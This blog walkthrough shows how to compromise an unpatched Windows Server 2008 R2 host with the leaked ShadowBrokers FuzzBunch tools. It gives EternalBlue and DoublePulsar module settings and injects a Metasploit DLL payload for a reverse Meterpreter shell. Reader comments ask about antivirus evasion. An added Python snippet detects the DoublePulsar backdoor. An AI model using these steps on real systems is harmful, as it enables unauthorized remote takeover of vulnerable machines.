This walkthrough assumes you know a thing or two and won't go into major detail. After all, it's meant for fellow researchers and penetration testers.
Findings so far…
Findings from using these tools so far are the following.
Note: The default process that DoublePulsar injects into is 'lsass'. While testing against Windows 2008 R2 SP1 it was observed that this caused the 'lsass' process to become unstable over time, in some cases resulting in a BSOD.
- No domain is needed for the tools to work.
- An active user session is also not needed.
Fuzzbunch setup
Firstly we need to set up our environment for the ShadowBrokers tools to run in.
In my case I created a Windows 7 VM for the task.
Prerequisites for this exercise are:
- A Windows XP/7 VM
- Python 2.6
- Pywin32 Version 2.12
- ShadowBroker Dump
Once your environment is setup and you have downloaded the ShadowBroker archive, unzip it to a path of your choice.
In this instance I chose the root of the C: drive.
We then need to edit a few of the files to work with our environment, as on first run you will receive various error messages.
Firstly we need to edit the "fb.py" file located in the /windows folder and comment out the line below.
Save the file and open up "Fuzzbunch.xml"; you now need to change the "ResourcesDir" and "LogDir" paths to match those of your environment.
Note: If there is no log directory then please create it and add the path.
We should now be ready to run the Fuzzbunch tool.
Launch a command prompt and navigate to the /windows folder inside the ShadowBrokers folder.
Type the below command and hit return.
fb.py
FuzzBunch should now be running in your command prompt like the screenshot below.
Listener and Payload
Now we need to set up our Linux attack box. For the purpose of this post I'll be using a Kali rolling VM with Metasploit installed.
Let's go ahead and launch Metasploit, then create a DLL payload and a listener.
The target I am attacking is an x64 Windows Server 2008 R2 system, so I set up the following payload and saved it as shown in the screenshot below.
Now for the handler: an x64 reverse TCP Meterpreter.
We’ll run the handler and move on to the next step.
OK, the payload you created needs copying over to the virtual machine where FuzzBunch is sitting and waiting.
Back to Fuzzbunch
Let’s return to our Windows VM.
We can now start entering our details into the FuzzBunch tool.
For most settings we can accept the defaults; the ones that we do need to change are below.
[?] Default Target IP Address [] : Your Target's IP
[?] Default Callback IP Address [] : Your VM's IP
[?] Use Redirection [yes] : NO
[?] Base Log directory [c:\logs] : Input your log path

Index  Project
-----  -------
0      Create a New Project

[?] Project [0] : 0
[?] New Project Name : Give your project a name
Now our initial variables are set, you should be at the fb prompt.
Launching the exploit plugin
Launch the EternalBlue module.
use eternalblue
Again, we can accept all defaults except the below.
[*] Mode :: Delivery mechanism
 0) DANE  Forward deployment via DARINGNEOPHYTE
*1) FB    Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
Change the above from its default setting of "0" to "1"; you can then execute the exploit. (Some details from my test have been redacted for security.)
Injecting our DLL payload
Now that the tool has created the backdoor on the vulnerable system, we can move on to running DoublePulsar, which will inject our DLL payload.
use doublepulsar
Once again we can accept most of the defaults, just change the variables below.
[*] Architecture :: Architecture of the target OS
 0) x86  x86 32-bits
*1) x64  x64 64-bits
The above setting defaults to x86 and will need changing to x64.
[+] Set Architecture => x64
[*] Function :: Operation for backdoor to perform
*0) OutputInstall  Only output the install shellcode to a binary file on disk.
 1) Ping           Test for presence of backdoor
 2) RunDLL         Use an APC to inject a DLL into a user mode process.
 3) RunShellcode   Run raw shellcode
 4) Uninstall      Remove's backdoor from system
[?] Function [0] :
We need to select option “2” so that we can use our newly created DLL payload.
Next we need to enter the path to our DLL file.
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : PathToOurDLL
All other variables can be left at their default value and you can proceed to execute the plugin.
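As a defender-side counterpart to the Ping function listed above, the following is an added example (not part of the original post, and not code from the leaked tools) that classifies the reply to the Trans2 SESSION_SETUP probe DoublePulsar answers to: a clean SMBv1 server echoes the probe's multiplex ID 0x41, whereas a host carrying the backdoor answers with 0x51. The packets are constructed inline rather than captured, so the block runs offline; a live check would send the probe to TCP 445 and pass the reply to classify_trans2_response.

```python
import struct

# SMBv1 wire-format values the check relies on.
SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
PROBE_MID = 0x41      # multiplex ID carried by the Trans2 SESSION_SETUP probe
BACKDOOR_MID = 0x51   # PROBE_MID + 0x10: the value the DoublePulsar backdoor returns

def build_smb_packet(command, status, mid, tid=0x0800, pid=0xFEFF, uid=0x0800):
    """Build a minimal NetBIOS-framed SMBv1 reply (constructed sample data only)."""
    header = (SMB_MAGIC
              + bytes([command])
              + struct.pack("<I", status)
              + bytes([0x98])                 # Flags: marks the packet as a server reply
              + struct.pack("<H", 0xC807)     # Flags2
              + b"\x00\x00"                   # PID high
              + b"\x00" * 8                   # security signature
              + b"\x00\x00"                   # reserved
              + struct.pack("<HHHH", tid, pid, uid, mid))
    body = b"\x00" + b"\x00\x00"               # WordCount = 0, ByteCount = 0
    payload = header + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload

def parse_smb_header(packet):
    """Return the SMBv1 header fields of a NetBIOS-framed packet."""
    if len(packet) < 36:
        raise ValueError("too short for NetBIOS session header + SMB header")
    if packet[0] != 0x00 or int.from_bytes(packet[1:4], "big") != len(packet) - 4:
        raise ValueError("bad NetBIOS session header")
    hdr = packet[4:36]
    if hdr[:4] != SMB_MAGIC:
        raise ValueError("not an SMBv1 header")
    tid, pid, uid, mid = struct.unpack("<HHHH", hdr[24:32])
    return {"command": hdr[4], "status": struct.unpack("<I", hdr[5:9])[0],
            "tid": tid, "pid": pid, "uid": uid, "mid": mid}

def classify_trans2_response(packet):
    """Classify the reply to a Trans2 SESSION_SETUP probe that was sent with MID 0x41."""
    fields = parse_smb_header(packet)
    if fields["command"] != SMB_COM_TRANSACTION2:
        return "unexpected"          # not a reply to our probe at all
    if fields["mid"] == BACKDOOR_MID:
        return "infected"            # the backdoor rewrote the multiplex ID
    if fields["mid"] == PROBE_MID:
        return "clean"               # a normal server echoes the request MID
    return "unknown"

# Constructed sample replies (not real captures).
CLEAN_REPLY = build_smb_packet(SMB_COM_TRANSACTION2, 0x00000000, PROBE_MID)
INFECTED_REPLY = build_smb_packet(SMB_COM_TRANSACTION2, 0x00000000, BACKDOOR_MID)

if __name__ == "__main__":
    for name, pkt in (("clean host", CLEAN_REPLY), ("backdoored host", INFECTED_REPLY)):
        print(f"{name}: {classify_trans2_response(pkt)}")
```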
Hack all the things!
If everything has been successful you should now have a Meterpreter shell waiting on your attack box.
Note: If you don't have a shell yet then something has obviously gone wrong; check your steps and leave a comment and I will try and help you through it.
any tips on how to prevent the Lsass.exe from crashing (BSOD)?
Hi JC, I am still investigating what causes the lsass process to crash. It could be due to other pieces of software/services running on this particular host.
Thanks, do you use any kind of encoder to evade antivirus software? And can this exploit be used against other processes or only against lsass?
Only Darkpulsar is available; there is no doublepulsar.
Have used many git sources of fuzzbunch, some even don't have the option of Eternalblue itself!!! Please help
Hi, after writing this article a Metasploit module was created which works very well. There shouldn't be a need to use the original tools anymore. Hope this helps and thanks for reaching out!